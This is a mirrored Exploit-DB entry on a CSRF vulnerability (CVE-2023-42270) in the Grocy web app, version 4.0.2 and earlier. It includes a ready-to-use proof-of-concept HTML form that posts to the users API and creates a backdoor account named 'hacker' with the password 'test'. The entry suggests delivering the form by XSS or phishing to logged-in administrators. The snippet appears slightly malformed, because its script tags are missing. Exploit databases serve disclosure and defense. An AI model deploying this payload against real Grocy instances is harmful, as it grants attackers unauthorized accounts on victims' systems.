[webapps] Grocy <=4.0.2 - CSRF

 5 months ago
source link: https://www.exploit-db.com/exploits/51760
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Grocy <=4.0.2 - CSRF



EDB Verified:







Vulnerable App:

# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability
# Application: Grocy
# Version: <= 4.0.2
# Date: 09/21/2023
# Exploit Author: Chance Proctor
# Vendor Homepage: https://grocy.info/
# Software Link: https://github.com/grocy/grocy
# Tested on: Linux
# CVE : CVE-2023-42270

When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.
This makes it easy to adjust your request since it is a known format. 
There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.
This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.

Proof of Concept
Host the following html code via a XSS or delivery via a phishing campaign:

	<form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">
	<input name='username' value='hacker' type='hidden'>
	<input name='password' value='test' type='hidden'>
	<input type=submit>
	history.pushState('','', '/');

If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials

	Username: hacker
	Password: test

In order for this to work, the target must have Create User Permissions.
This is enabled by default.

Proof of Exploit/Reproduce

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